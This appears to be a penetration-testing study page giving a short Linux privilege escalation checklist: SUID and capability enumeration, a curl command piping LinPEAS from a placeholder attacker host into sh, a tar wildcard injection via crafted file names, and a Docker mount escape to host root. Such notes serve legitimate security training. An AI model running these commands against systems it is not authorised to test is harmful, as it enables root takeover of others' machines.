ZeroBox

Linux Privilege Escalation Master Guide

Comprehensive Linux privilege escalation checklist: SUID binaries, Linux capabilities, sudo misconfigurations, cron wildcards, and container escapes.

linpeaspspyfindgetcapsudo

Privilege escalation on Linux relies on identifying misconfigured permissions, SUID binaries, custom root cronjobs, or kernel vulnerabilities.

1. SUID Binaries & Capabilities

Find all files with SUID bit set:

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

Audit binary capabilities:

getcap -r / 2>/dev/null

2. Sudo Privileges & GTFOBins

Check current user permissions:

sudo -l

3. Automated Enumeration

Pipe LinPEAS directly into bash memory:

curl -L http://{LHOST}:8000/linpeas.sh | sh

Sniff transient cronjobs with pspy without root privileges:

./pspy64 -pf -i 1000

4. Tar Wildcard Injection Exploit

If a root cronjob runs tar -czf backup.tar.gz *:

touch /var/backup/--checkpoint=1
touch "/var/backup/--checkpoint-action=exec=sh root.sh"

5. Docker Container Escape

Mount the host root filesystem from inside Docker:

docker run -v /:/host -it alpine chroot /host /bin/bash

Check extracted hashes against 10. Password Cracking & Hash Identification.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox